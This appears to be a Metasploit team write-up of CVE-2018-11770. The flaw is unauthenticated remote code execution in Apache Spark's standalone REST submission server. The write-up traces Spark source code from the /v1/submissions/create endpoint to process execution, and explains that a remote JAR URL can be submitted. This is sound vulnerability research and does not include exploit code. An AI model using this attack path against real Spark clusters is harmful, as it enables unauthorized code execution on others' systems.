In November 2018, Metasploit committer and community member Green-m submitted a module for “spark_unauth_rce”. Apache Spark is an open-source cluster-computing framework that was originally developed by UC Berkeley’s AMPLab and is maintained by the Apache Software Foundation. It is primarily written in Scala and is designed to be a fast unified analytics engine for large data. It is common in enterprise environments, which always catches our attention. Researcher Fengwei Zhang of Alibaba’s cloud security team discovered the REST API CreateSubmissionRequest can be abused while in standalone mode to allow users to submit malicious code that results in remote code execution. According to Apache Spark's security issue list, this vulnerability was assigned CVE-2018-11770.

Vulnerability Analysis According to the Apache Software Foundation, versions from 1.3.0 running standalone master with REST API enabled are vulnerable, as are versions running Mesos master with cluster mode enabled. For testing purposes, the vulnerable version of Apache Spark can be installed as a Docker container by performing the following:

$ git clone https://github.com/vulhub/vulhub/tree/master/spark/unacc $ docker-compose up -d

There’s a community-written walkthrough of manual installation for the Windows version here. The release notes for Apache Spark indicate that the vulnerability was patched in version 2.4.0, and you can see the corresponding Jira ticket here. The pull request can be found at #22071, where we learn the following specifics: REST submission server is disabled by default in standalone mode



Fails the standalone master if REST server enabled and authentication secret set



Fails the mesos cluster dispatcher if authentication secret set



When submitting a standalone application, only try the REST submission first if spark.master.rest.enabled=true (in the config file) Apache Spark is well-documented—from release notes to Jira tickets and pull requests—so it doesn't take long to identify the code responsible for the insecure submission. Based on the patch, the culprit is the StandaloneRestServer class.

Abstract RestSubmissionServer The StandaloneRestServer class actually extends from the abstract RestSubmissionServer class, so we need to look at that first. In the beginning of this class, it tells us how the URLs are mapped:

protected val baseContext = s"/${RestSubmissionServer.PROTOCOL_VERSION}/submissions" protected lazy val contextToServlet = Map[String, RestServlet]( s"$baseContext/create/*" -> submitRequestServlet, s"$baseContext/kill/*" -> killRequestServlet, s"$baseContext/status/*" -> statusRequestServlet, "/*" -> new ErrorServlet // default handler )

The above tells us that if the server sees a request in this format, go to the submitRequestServlet class : /v1/submissions/create Inside the submitRequestServlet class, there is a doPost function:

protected override def doPost( requestServlet: HttpServletRequest, responseServlet: HttpServletResponse): Unit = { val responseMessage = try { val requestMessageJson = Source.fromInputStream(requestServlet.getInputStream).mkString val requestMessage = SubmitRestProtocolMessage.fromJson(requestMessageJson) // The response should have already been validated on the client. // In case this is not true, validate it ourselves to avoid potential NPEs. requestMessage.validate() handleSubmit(requestMessageJson, requestMessage, responseServlet) } catch { // The client failed to provide a valid JSON, so this is not our fault case e @ (_: JsonProcessingException | _: SubmitRestProtocolException) => responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST) handleError("Malformed request: " + formatException(e)) } sendResponse(responseMessage, responseServlet) }

What this does is retrieve data from the stream, normalize it, and then pass that to a handleSubmit function. Anyone using RestSubmissionServer would have to implement handleSubmit .

StandaloneRestServer Now that we have a basic understanding of the abstract class, we can look at the subclasses. StandaloneRestServer is one of those that extends RestSubmissionServer and seems to fit the description of the problem.

private[deploy] class StandaloneRestServer( host: String, requestedPort: Int, masterConf: SparkConf, masterEndpoint: RpcEndpointRef, masterUrl: String) extends RestSubmissionServer(host, requestedPort, masterConf)

It's also easy to identify what we should be looking at because of this line in the code:

protected override val submitRequestServlet = new StandaloneSubmitRequestServlet(masterEndpoint, masterUrl, masterConf)

In StandaloneSubmitRequestServlet , we find the handleSubmit code we need:

protected override def handleSubmit( requestMessageJson: String, requestMessage: SubmitRestProtocolMessage, responseServlet: HttpServletResponse): SubmitRestProtocolResponse = { requestMessage match { case submitRequest: CreateSubmissionRequest => val driverDescription = buildDriverDescription(submitRequest) val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse]( DeployMessages.RequestSubmitDriver(driverDescription)) val submitResponse = new CreateSubmissionResponse submitResponse.serverSparkVersion = sparkVersion submitResponse.message = response.message submitResponse.success = response.success submitResponse.submissionId = response.driverId.orNull val unknownFields = findUnknownFields(requestMessageJson, requestMessage) if (unknownFields.nonEmpty) { // If there are fields that the server does not know about, warn the client submitResponse.unknownFields = unknownFields } submitResponse case unexpected => responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST) handleError(s"Received message of unexpected type ${unexpected.messageType}.") } }

The BuildDriverDescription Call in handleSubmit Looking at the code, the buildDriverDescription function seems interesting. To start with, it reveals what the appResource parameter means. The function is large, but it begins this way:

val appResource = Option(request.appResource).getOrElse { throw new SubmitRestMissingFieldException("Application jar is missing.") }

Toward the end of the code, it is passed in DriverDescription :

new DriverDescription(appResource, actualDriverMemory, actualDriverCores, actualSuperviseDriver, command)

When we look at the DriverDescription class, we understand appResource 's purpose, which is a URL to a JAR file:

private[deploy] case class DriverDescription( jarUrl: String, mem: Int, cores: Int, supervise: Boolean, command: Command)

This means that when we create a submission request, we can pass a JAR from remote, which dictates the attack vector. The buildDriverDescription function also contains clues about how the JAR is launched:

val command = new Command( "org.apache.spark.deploy.worker.DriverWrapper", Seq("{{WORKER_URL}}", "{{USER_JAR}}", mainClass) ++ appArgs, environmentVariables, extraClassPath, extraLibraryPath, javaOpts)

The Command class is defined as follows:

private[spark] case class Command( mainClass: String, arguments: Seq[String], environment: Map[String, String], classPathEntries: Seq[String], libraryPathEntries: Seq[String], javaOpts: Seq[String]) { }

We see that the first argument is the main class, which in this case is org.apache.spark.deploy.worker.DriverWrapper . It is meant to invoke our main method:

val clazz = Utils.classForName(mainClass) val mainMethod = clazz.getMethod("main", classOf[Array[String]]) mainMethod.invoke(null, extraArgs.toArray[String])

After the driver description is crafted, it is sent to another component called RequestSubmitDriver :

val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](DeployMessages.RequestSubmitDriver(driverDescription))

RequestSubmitDriver RequestSubmitDriver can be found in the receiveAndReply function in Master.scala:

case RequestSubmitDriver(description) => if (state != RecoveryState.ALIVE) { val msg = s"${Utils.BACKUP_STANDALONE_MASTER_PREFIX}: $state. " + "Can only accept driver submissions in ALIVE state." context.reply(SubmitDriverResponse(self, false, None, msg)) } else { logInfo("Driver submitted " + description.command.mainClass) val driver = createDriver(description) persistenceEngine.addDriver(driver) waitingDrivers += driver drivers.add(driver) schedule()

In the else block, we see that based on the description, our driver is added to some collection of drivers before it calls for schedule() .

private def schedule(): Unit = { if (state != RecoveryState.ALIVE) { return } val shuffledAliveWorkers = Random.shuffle(workers.toSeq.filter(_.state == WorkerState.ALIVE)) val numWorkersAlive = shuffledAliveWorkers.size var curPos = 0 for (driver = driver.desc.mem && worker.coresFree >= driver.desc.cores) { launchDriver(worker, driver) waitingDrivers -= driver launched = true } curPos = (curPos + 1) % numWorkersAlive } } startExecutorsOnWorkers() }

Notice this launchDriver function. Looking further:

private def launchDriver(worker: WorkerInfo, driver: DriverInfo) { logInfo("Launching driver " + driver.id + " on worker " + worker.id) worker.addDriver(driver) driver.worker = Some(worker) worker.endpoint.send(LaunchDriver(driver.id, driver.desc)) driver.state = DriverState.RUNNING }

The code relies on the Worker class to launch the driver. We can find this in Worker.scala :

case LaunchDriver(driverId, driverDesc) => logInfo(s"Asked to launch driver $driverId") val driver = new DriverRunner( conf, driverId, workDir, sparkHome, driverDesc.copy(command = Worker.maybeUpdateSSLSettings(driverDesc.command, conf)), self, workerUri, securityMgr) drivers(driverId) = driver driver.start()

If you’re wondering what driver.start() does, you’re not alone. Since this is from a DriverRunner instance, that's where we find the code.

DriverRunner The purpose of DriverRunner is self-explanatory. The Worker class tells us we should be looking at the start() function; there is a lot of code for process setup and handling, which we’ll skip to get to the point. Tracing from start() , it leads to a path of start() to prepareAndRunDriver() , to runDriver() , and finally to runCommandWithRetry() . The runCommandWithRetry() function then executes our code using ProcessBuilder :

private[worker] def runCommandWithRetry( command: ProcessBuilderLike, initialize: Process => Unit, supervise: Boolean): Int = { // ... code snipped ... synchronized { if (killed) { return exitCode } process = Some(command.start()) initialize(process.get) }

Now that we have found the code that executes our payload, we should have a basic understanding of what the execution flow looks like.

Patch Notes Apache indicated the vulnerability was patched in version 2.4.0 as of Aug. 14, 2018, but the fix it implemented was to “disable the REST API by setting spark.master.rest.enabled to false” and/or to “ensure that all network access to the REST API (port 6066 by default) is restricted to hosts that are trusted to submit jobs.” The fix, in other words, smells a whole lot more like a workaround than a true patch. We don’t point this out because the fix was unreasonable or ineffective—on the contrary, software producers often call functional workarounds patches when true patching isn't a realistic or cost-effective option. We would be remiss if we failed to mention that Apache Spark has quite a few beneficial software development habits that Metasploit appreciates and others may want to consider implementing. Throughout the review process, we noticed that PR numbers were attached to tickets whenever possible, and PR titles were properly labeled with Jira ticket numbers. Developers take the time to write detailed descriptions for their pull requests, and they devote genuine effort to ensuring reviewers understand them. This is rare in our experience. We also admired the dedication to thorough code review, well-written release notes, useful references, and comments evident throughout the codebase.